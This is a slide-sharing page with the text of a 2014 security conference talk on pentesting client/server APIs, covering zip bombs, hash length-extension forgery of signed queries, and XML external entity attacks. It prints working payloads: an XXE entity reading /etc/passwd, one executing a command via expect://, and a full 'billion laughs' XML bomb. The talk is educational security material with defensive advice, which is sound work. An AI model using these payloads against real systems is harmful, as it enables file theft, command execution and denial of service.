CodeFest 2014 - Pentesting client/server API

50 %
50 %
Information about CodeFest 2014 - Pentesting client/server API
Technology

Published on April 5, 2014

Author: sergeybelove

Source: slideshare.net

Description

http://2014.codefest.ru/lecture/696

Pentesting client/server API Sergey Belov

$ whoami © 2002—2014, Digital Security 2 • Senior Security Auditor at Digital Security • BugHunter: Google, Yandex, Badoo, Yahoo +++ • Writer: habrahabr, Xakep magazine • CTF: DEFCON 2012 CTF Final, Chaos Construction CTF’2013 • Speaker: CodeFest 2012, ZeroNights 0x03 • Trainer: Hack in Paris’2014, BlackHat’2014 USA (soon)

What are we talking about? © 2002—2014, Digital Security 3 API

What are we talking about? © 2002—2014, Digital Security 4 API

Hacking via API © 2002—2014, Digital Security 5

Hacking via API © 2002—2014, Digital Security 6

Hacking via API © 2002—2014, Digital Security 7 From interface to API methods

Hacking via API © 2002—2014, Digital Security 8

Hacking via API © 2002—2014, Digital Security 9

Hacking via API © 2002—2014, Digital Security 10

Hacking via API © 2002—2014, Digital Security 11

Hacking via API © 2002—2014, Digital Security 12 What should we test? • Logic! • Bypassing restrictions (sqli/xss) • Parameter tampering Developing • Stop hacks and custom implementation in API! Really

Hacking via API © 2002—2014, Digital Security 13

Hacking via API © 2002—2014, Digital Security 14 ZIP

Hacking via API © 2002—2014, Digital Security 15 42 Kb…

Hacking via API © 2002—2014, Digital Security 16 42 Kb… …10 Gb?

Hacking via API © 2002—2014, Digital Security 17 42 Kb… …10 Gb? …100 Gb?

Hacking via API © 2002—2014, Digital Security 18 42 Kb… …10 Gb? …100 Gb? …100 Tb?

Hacking via API © 2002—2014, Digital Security 19 42 Kb… …10 Gb? …100 Gb? …100 Tb? …4.5 Pb! http://www.unforgettable.dk/

Hacking via API © 2002—2014, Digital Security 20 Say HELLO to ZIP BOMB!

Hacking via API © 2002—2014, Digital Security 21 The evil of JavaScript and

Hacking via API © 2002—2014, Digital Security 22

Hacking via API © 2002—2014, Digital Security 23

Hacking via API © 2002—2014, Digital Security 24 http://habrahabr.ru/post/186160/

Hacking via API © 2002—2014, Digital Security 25 Crypto

Hacking via API © 2002—2014, Digital Security 26 Query signing Sign = sha*(…+DATA+…) APIkey

Hacking via API © 2002—2014, Digital Security 27

Hacking via API © 2002—2014, Digital Security 28 But why?

Hacking via API © 2002—2014, Digital Security 29 Say hello again. To length extension attack

Hacking via API © 2002—2014, Digital Security 30 A=1&B=2&C=3 07ce36c769ae130708258fb5dfa3d37ca5a67514 TOKEN=sha1(KEY+DATA)

Hacking via API © 2002—2014, Digital Security 31 Some have hijacked just 1 request…

Hacking via API © 2002—2014, Digital Security 32 What does the attacker know? • Original data • Sign (token)

Hacking via API © 2002—2014, Digital Security 33 What does the attacker want? Change some data / change params

Hacking via API © 2002—2014, Digital Security 34 A=1&B=2&C=3x80x00x00…x02&C=4

Hacking via API © 2002—2014, Digital Security 35 Can sign new query without API key! Vkontakte: sig = md5(name1=value1name2=value2api_secret) Mail.RU sig = md5(uid + params + private_key) http://www.vnsecurity.net/2010/03/codegate_challenge15_sha1_padding_attack

Hacking via API © 2002—2014, Digital Security 36 Request hijacking… How?

Hacking via API © 2002—2014, Digital Security 37

Hacking via API © 2002—2014, Digital Security 38

Hacking via API © 2002—2014, Digital Security 39

Hacking via API © 2002—2014, Digital Security 40

Hacking via API © 2002—2014, Digital Security 41

Hacking via API © 2002—2014, Digital Security 42

Hacking via API © 2002—2014, Digital Security 43

Hacking via API © 2002—2014, Digital Security 44

Hacking via API © 2002—2014, Digital Security 45 XML? XML entities!

Hacking via API © 2002—2014, Digital Security 46 DTD Example: <!ENTITY writer "Donald Duck."> <!ENTITY copyright "Copyright W3Schools."> XML example: <author>&writer;&copyright;</author>

Hacking via API © 2002—2014, Digital Security 47 XML entities? External Entity!

Hacking via API © 2002—2014, Digital Security 48 <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <foo>&xxe;</foo>

Hacking via API © 2002—2014, Digital Security 49 <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM “expect://id" >]> <foo>&xxe;</foo>

Hacking via API © 2002—2014, Digital Security 50 XML Bombs!

Hacking via API © 2002—2014, Digital Security 51 <?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lolz>&lol9;</lolz>

What are we talking about? © 2002—2014, Digital Security 52 Man in the Middle

Hacking via API © 2002—2014, Digital Security 53 Examples?

Hacking via API © 2002—2014, Digital Security 54 2013-11-19 by Reginaldo Silva

Hacking via API © 2002—2014, Digital Security 55 https://www.facebook.com/BugBounty/posts/778897822124446 http://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution

Hacking via API © 2002—2014, Digital Security 56 Testing: • https://www.owasp.org/index.php/Testing_for_XML_Injection_(OWASP-DV-008) • XXE to RCE https://gist.github.com/joernchen/3623896 Development: • Disable entities

Hacking via API © 2002—2014, Digital Security 57 Finally: • Re-test all interface restrictions; • Specific compressions; • JS callbacks; • Crypto + SSL test + hardcoded credentials (hackapp.com); • XML - XXE; • Anything else :]

twitter.com/sergeybelove sbelov@dsec.ru Digital Security в Москве: (495) 223-07-86 Digital Security в Санкт-Петербурге: (812) 703-15-47 Hacking via API Thanks for your attention! Questions? © 2002—2014, Digital Security 58

Add a comment

Related presentations

Presentación que realice en el Evento Nacional de Gobierno Abierto, realizado los ...

In this presentation we will describe our experience developing with a highly dyna...

Presentation to the LITA Forum 7th November 2014 Albuquerque, NM

Un recorrido por los cambios que nos generará el wearabletech en el futuro

Um paralelo entre as novidades & mercado em Wearable Computing e Tecnologias Assis...

Microsoft finally joins the smartwatch and fitness tracker game by introducing the...

Related pages

CodeFest 2014 - pentesting client/server API - YouTube

http://2014.codefest.ru/lecture/696. Skip ... Web PenTesting Workshop Part 1 of 12 Intro to ... POSTMAN RESTful API testing app demo ...
Read more

@sergeybelove

date title; 2014-03-29 [ScreenCast] CodeFest 2014 - pentesting client/server API (sha1 padding & xxe demo) 2014-03-29 [Public talk] CodeFest 2014 ...
Read more

CodeFest 2014 - video invitation - YouTube

CodeFest 2014 - video invitation Sergey Belov. ... CodeFest 2014 - pentesting client/server API - Duration: 3:47. Sergey Belov 1,499 views. 3:47
Read more

Sergey Belov - Google+

Sergey Belov - Завтра ... CodeFest 2014 - pentesting client/server API. 1. Add a comment... Sergey Belov ... CodeFest 2014 - video invitation. 6.
Read more

GitHub - juli1/citiparks: Citiparks projcet for codefest 2014

Citiparks projcet for codefest 2014. 7 commits 1 branch 0 releases Fetching contributors JavaScript 77.1%; HTML 17.5%; CSS 5.4%; JavaScript ...
Read more

Client/server | LinkedIn

Client Server ComputingClient server computing is a term that describes computing model in which ... CodeFest 2014 - Pentesting client/server API. 26,460 ...
Read more

codefest.at | Das Weblog rund um Software Entwicklung und ...

CodeFest.at on Facebook. RecentPosts. GeoJSON & (SQL) Spatial Data ... api; app; apps; architektur; asp.net; asp.net mvc; azure; azure tutorial; build ...
Read more

Pentesting | LinkedIn

View 4483 Pentesting posts, presentations, experts, and more. Get the professional knowledge you need on LinkedIn. LinkedIn Home What is LinkedIn?
Read more

Calling a Web API From a .NET Client in ASP.NET Web API 2 ...

Calling a Web API From a .NET Client in ASP.NET Web API 2 (C#) By Mike Wasson Mike Wasson | January 20, 2014 Print ...
Read more